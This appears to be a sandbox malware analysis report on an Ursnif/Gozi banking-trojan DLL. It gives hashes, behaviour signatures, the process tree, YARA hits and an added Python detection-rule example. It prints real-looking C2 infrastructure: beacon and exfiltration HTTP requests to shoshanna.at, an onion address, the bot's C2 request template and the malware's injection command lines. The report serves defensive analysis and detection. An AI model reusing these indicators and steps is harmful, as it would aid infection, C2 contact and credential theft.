Analysis Report o0AX0nKiUn.dll

Overview

General Information

Sample Name: o0AX0nKiUn.dll
Analysis ID: 391256
MD5: a3aa691bc97faf6f17eec0841b5ff730
SHA1: 9a642c22ebc19f4f8063b5ae986843916309b95a
SHA256: eb639e9d45ed4d4cf911195b7ef53d61897dd8f826c542ae411854ddec3aea87
Tags: dll, Gozi, ISFB, Ursnif

Detection

Gozi, Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5920 cmdline: loaddll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 640 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5984 cmdline: rundll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7096 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 1940 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\o0AX0nKiUn.dll,Lengthwhether MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • nslookup.exe (PID: 5232 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
    • control.exe (PID: 7116 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6076 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
          • rundll32.exe (PID: 5904 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3880 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
          • rundll32.exe (PID: 6176 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 5980 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\94BA.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 5244 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\94BA.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5208 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 6156 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
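The process tree above is the most reusable detection material in this report: the nslookup-based external IP check with its output redirected to a Temp\*.bi1 file, rundll32.exe loading a dropped DLL from %APPDATA%\Microsoft\<random>\ through DllRegisterServer, and rundll32.exe spawning control.exe with only "/?" as a host for injected code. The following Python is an added example, not part of the Joe Sandbox output, that encodes those four patterns as rules over process-creation events. The event field names (Sysmon-style), the PIDs and the two benign control events are assumptions; the malicious command lines are copied from the tree.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon EID 1 style; field names are hypothetical)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


# Rules derived from the Startup tree of this report. Each returns True when the
# event matches the pattern described in the comment above it.
RULES = {
    # nslookup used to learn the victim's public IP address (myip.opendns.com).
    "external_ip_lookup_via_nslookup": lambda e: (
        _base(e.image) == "nslookup.exe"
        and re.search(r"myip\.opendns\.com", e.cmdline, re.I) is not None
    ),
    # cmd /C redirecting nslookup output into %LOCALAPPDATA%\Temp\<name>.bi1.
    "nslookup_output_to_temp_bi1": lambda e: (
        _base(e.image) == "cmd.exe"
        and re.search(r"nslookup .*>\s*\S+\\Temp\\[^\\]+\.bi1", e.cmdline, re.I) is not None
    ),
    # rundll32 loading a DLL dropped under %APPDATA%\Microsoft\<dir>\ via DllRegisterServer.
    "rundll32_appdata_dll_dllregisterserver": lambda e: (
        _base(e.image) == "rundll32.exe"
        and re.search(
            r"\\AppData\\Roaming\\Microsoft\\[^\\']+\\[^\\']+\.dll'?,\s*DllRegisterServer",
            e.cmdline, re.I) is not None
    ),
    # rundll32 spawning control.exe with nothing but "/?" (a process to inject into).
    "rundll32_spawns_control_help": lambda e: (
        _base(e.image) == "control.exe"
        and _base(e.parent_image) == "rundll32.exe"
        and e.cmdline.rstrip().endswith("/?")
    ),
}


def detect(events):
    """Return sorted (rule_name, pid) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.pid))
    return sorted(hits)


# Constructed events modelled on the Startup tree (command lines copied from the
# report; PIDs follow the report where it gives them, the benign ones are invented).
EVENTS = [
    ProcEvent(5984, r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll',#1",
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(7096, r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe /?",
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(5232, r"C:\Windows\System32\nslookup.exe",
              r"nslookup myip.opendns.com resolver1.opendns.com",
              r"C:\Windows\SysWOW64\rundll32.exe"),
    ProcEvent(6076, r"C:\Windows\System32\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer",
              r"C:\Windows\explorer.exe"),
    ProcEvent(5980, r"C:\Windows\System32\cmd.exe",
              r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\94BA.bi1'",
              r"C:\Windows\explorer.exe"),
    # Benign controls (constructed): a normal Control Panel launch and an internal lookup.
    ProcEvent(1001, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
              r"C:\Windows\explorer.exe"),
    ProcEvent(1002, r"C:\Windows\System32\nslookup.exe",
              r"nslookup intranet.example.local",
              r"C:\Windows\System32\cmd.exe"),
]


if __name__ == "__main__":
    for name, pid in detect(EVENTS):
        print(f"{name:40s} pid={pid}")
```

The rules deliberately key on the parent/child relationship and the argument shapes rather than on the random names (AppXtcse, AJRovrcp.dll, 94BA.bi1, Lengthwhether), which change from build to build; only the "/?" control.exe rule needs the parent image, because control.exe /? on its own is harmless.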

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(44 matching memory dumps in total; the first five are listed here)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: o0AX0nKiUn.dll | Avira: detected
Multi AV Scanner detection for domain / URL
Source: shoshanna.at | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: o0AX0nKiUn.dll | Virustotal: Detection: 61%
Source: o0AX0nKiUn.dll | Metadefender: Detection: 44%
Source: o0AX0nKiUn.dll | ReversingLabs: Detection: 62%
Machine Learning detection for sample
Source: o0AX0nKiUn.dll | Joe Sandbox ML: detected
Source: o0AX0nKiUn.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: o0AX0nKiUn.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Opposite\Build\Colony\fight\Book\appear\ruleEquate.pdb | source: loaddll32.exe, 00000000.00000002.319282240.0000000003990000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.323593002.000000006D4F4000.00000002.00020000.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000F.00000000.349563208.000000000EC20000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.313886587.0000000003EE0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.307192295.0000000005640000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: explorer.exe, 0000000F.00000003.404431790.00000000072C0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.313886587.0000000003EE0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.307192295.0000000005640000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb | source: control.exe, 0000000D.00000002.329142996.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000002.379228642.000001A4D17FC000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb | source: explorer.exe, 0000000F.00000003.404431790.00000000072C0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL | source: control.exe, 0000000D.00000002.329142996.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000002.379228642.000001A4D17FC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000F.00000000.349563208.000000000EC20000.00000002.00000001.sdmp
Only the first of these PDB paths belongs to the sample: it is found in the two processes that mapped the DLL (loaddll32.exe and the first rundll32.exe), and the meaningless c:\Opposite\Build\Colony\... directory is a usable pivot for hunting related builds. ntdll.pdb, wntdll.pdb, wscui.pdb and rundll32.pdb are the debug-symbol names of legitimate Windows modules loaded in the dumped processes and carry no signal.
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03172FE4 CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,KiUserExceptionDispatcher,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree | 3_2_03172FE4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_0092429A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary | 26_2_0092429A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_0091DABA memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose | 26_2_0091DABA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_00914D8B FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError | 26_2_00914D8B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_02CD2FE4 CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,KiUserExceptionDispatcher,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree | 26_2_02CD2FE4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49718 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.5:49718 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49728 -> 87.106.18.141:80
Found Tor onion address
Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp | String found in binary or memory: http://ey7kuuklgieop2pq.onion
Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Both strings were found in nine dumps each (the two control.exe instances, explorer.exe, five RuntimeBroker.exe instances and one rundll32.exe); the per-dump entries are merged above. The second string is the bot's C2 request template: the soft=/version=/user=/server=/id=/crc= and type=/name=/ip=/os=/tor=1 parameters, the "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ...)" User-Agent that reappears in the HTTP requests below, and the Software\AppDataLow\Software\Microsoft registry path with the value names (Client, Ini, Keys, LastTask, LastConfig, ...) under which Ursnif keeps its state. Its presence in RuntimeBroker.exe and explorer.exe is the memory-side evidence for the injection signatures listed above.
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Source: unknown | DNS query: name: myip.opendns.com (six identical queries from an unattributed process)
Uses nslookup.exe to query domains
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: global traffic | HTTP traffic detected: GET /images/agV_2BJF/gSHK7ixStYF72l8_2FB1iPk/NvJZbLqYhu/t0azbR_2FROp4xsEy/o1nQLJSnasHZ/kp7U5IED04L/D_2FED8TALa0Kx/eIDtBVCufsDQl2pGmyB4y/gSoVJjJAAjo_2BJ9/b8U1_2FzQrurByk/eSr_2Bot_2FEn_2FYg/lBo3_2Ff3/W7T322qSijmun2M4pfgd/g_2BOEUdchz/vjxSoRoj/8.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: POST /images/LJhn_2FB/_2BnW2YL3WT91OGEGrtontJ/tz26Ur16DO/Vb0fBvZMsYvl_2Ftu/hAIP2LXP9LpY/UxM1U2HyuE6/YjMWiIJ5hAHZr3/VX3S5GavgY0_2BoqFMO3c/kFSjrTDl92m3RG1t/2cQc5CJ1OGgDG5_/2BEmvyPeJqBWghHZ47/QHN7OVQJT/UOEF94X1N7KlQ62WDDer/L0w3gbwf5qg9Ac_2FDW/sra5_2BS3fbC4O/7.bmp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data; boundary=151135526142640864142783612034 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Content-Length: 387 | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/_2B8Z4ErblIEiDRe/kC_2Figz0SkbjHn/6jOzX3EKuL3lyOL1cD/BTKPgmIPC/XYwl4ZuHIILA2iobV6s1/J2zvfGVKkMO_2BIQ5Tm/IKt9b_2FJVgi_2FemqL5IS/Il9oN2Z5T3VSZ/uuw6K5sG/uaSFUVW8DD_2Bv5oPdSE4fb/lstSPlNyBE/NtRDiWqIykivR1G7A/Rzxtn_2Fw4e2ct/_2FO.jpeg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/2Y_2F6RzB9/IbmiwY5aHYYvOqaOS/K5jZbXosbSeK/EdsgE0YTjaN/bMXl9lrCtAHhd_/2B0u2oPHkq2ae72B_2Fb8/tf3HJkLJ_2F_2FBz/vZezlkFNpWzlI3R/de9t_2BxcR5u7AlPIB/esxImpzFI/SCLrc3wC4Pp8PYZIgsa_/2FLnetk_2FDmxoPLqhf/y_2BTzMwYgQdh_2B8_2Bms/1Y6MeWiew/k.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/Q7tPDHfXFlLYER/m6P1Iz7KW_2FIoT1WcTWi/FTUOZxr_2FYDCWQ1/jIDRTnKsfiNxUgM/nJuFzAQ8d2pYQg05Pn/X12EAaDLD/mTuYkOz3BbsiTnFaxfyZ/LUI8TqHYo05DZ7d9krs/Maj_2BCyUcD6fWwR0KVtli/_2F2zeHf21tl2/wgj2WFvg/q8vK3Hk8lj0AGiPlPkat_2B/UiJu.jpeg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/kvps_2BpTgbf2SnTu2ZwR29/J34HpNqIBq/YSB6ROND_2BfMiTtl/Mhu1aHVV6HlY/dKQ3IwmpGFj/76CuzoKlWX9PpM/9kr5gxTUHM4QcQe8bYo9p/_2FmB_2BGl_2Blf5/X_2Bk1py4xQSlsg/PFFhccF0W0UpbdOWLt/h78tKO8Ii/Ir64qCjSYvs90HHyBekU/xeBDaBaiMr3/av6sAJ4.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/agV_2BJF/gSHK7ixStYF72l8_2FB1iPk/NvJZbLqYhu/t0azbR_2FROp4xsEy/o1nQLJSnasHZ/kp7U5IED04L/D_2FED8TALa0Kx/eIDtBVCufsDQl2pGmyB4y/gSoVJjJAAjo_2BJ9/b8U1_2FzQrurByk/eSr_2Bot_2FEn_2FYg/lBo3_2Ff3/W7T322qSijmun2M4pfgd/g_2BOEUdchz/vjxSoRoj/8.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/_2B8Z4ErblIEiDRe/kC_2Figz0SkbjHn/6jOzX3EKuL3lyOL1cD/BTKPgmIPC/XYwl4ZuHIILA2iobV6s1/J2zvfGVKkMO_2BIQ5Tm/IKt9b_2FJVgi_2FemqL5IS/Il9oN2Z5T3VSZ/uuw6K5sG/uaSFUVW8DD_2Bv5oPdSE4fb/lstSPlNyBE/NtRDiWqIykivR1G7A/Rzxtn_2Fw4e2ct/_2FO.jpeg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/2Y_2F6RzB9/IbmiwY5aHYYvOqaOS/K5jZbXosbSeK/EdsgE0YTjaN/bMXl9lrCtAHhd_/2B0u2oPHkq2ae72B_2Fb8/tf3HJkLJ_2F_2FBz/vZezlkFNpWzlI3R/de9t_2BxcR5u7AlPIB/esxImpzFI/SCLrc3wC4Pp8PYZIgsa_/2FLnetk_2FDmxoPLqhf/y_2BTzMwYgQdh_2B8_2Bms/1Y6MeWiew/k.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/Q7tPDHfXFlLYER/m6P1Iz7KW_2FIoT1WcTWi/FTUOZxr_2FYDCWQ1/jIDRTnKsfiNxUgM/nJuFzAQ8d2pYQg05Pn/X12EAaDLD/mTuYkOz3BbsiTnFaxfyZ/LUI8TqHYo05DZ7d9krs/Maj_2BCyUcD6fWwR0KVtli/_2F2zeHf21tl2/wgj2WFvg/q8vK3Hk8lj0AGiPlPkat_2B/UiJu.jpeg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: global traffic | HTTP traffic detected: GET /images/kvps_2BpTgbf2SnTu2ZwR29/J34HpNqIBq/YSB6ROND_2BfMiTtl/Mhu1aHVV6HlY/dKQ3IwmpGFj/76CuzoKlWX9PpM/9kr5gxTUHM4QcQe8bYo9p/_2FmB_2BGl_2Blf5/X_2Bk1py4xQSlsg/PFFhccF0W0UpbdOWLt/h78tKO8Ii/Ir64qCjSYvs90HHyBekU/xeBDaBaiMr3/av6sAJ4.gif HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Host: shoshanna.at
Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp | String found in binary or memory: [cached google.de navigation-bar HTML, omitted here] equals www.youtube.com (Youtube)
Source: explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmp | String found in binary or memory: [cached google.de navigation-bar HTML, omitted here] equals www.youtube.com (Youtube)
These two matches come from Google page markup cached in explorer.exe's memory (the link list includes Suche, Bilder, Maps, Play, YouTube, News, Gmail, Drive and Kalender) and are not attributable to the sample; they appear only because the bot injected into explorer.exe and the whole process was dumped.
Source: unknown | DNS traffic detected: queries for: resolver1.opendns.com
Source: unknown | HTTP traffic detected: POST /images/LJhn_2FB/_2BnW2YL3WT91OGEGrtontJ/tz26Ur16DO/Vb0fBvZMsYvl_2Ftu/hAIP2LXP9LpY/UxM1U2HyuE6/YjMWiIJ5hAHZr3/VX3S5GavgY0_2BoqFMO3c/kFSjrTDl92m3RG1t/2cQc5CJ1OGgDG5_/2BEmvyPeJqBWghHZ47/QHN7OVQJT/UOEF94X1N7KlQ62WDDer/L0w3gbwf5qg9Ac_2FDW/sra5_2BS3fbC4O/7.bmp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data; boundary=151135526142640864142783612034 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) | Content-Length: 387 | Host: shoshanna.at
Source: RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmp | String found in binary or memory: http://buismashallah.at
Source: explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501761539.00000209ABB02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp | String found in binary or memory: http://buismashallah.atconstitution.org/usdeclar.txt0x4eb7d2cacom
Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
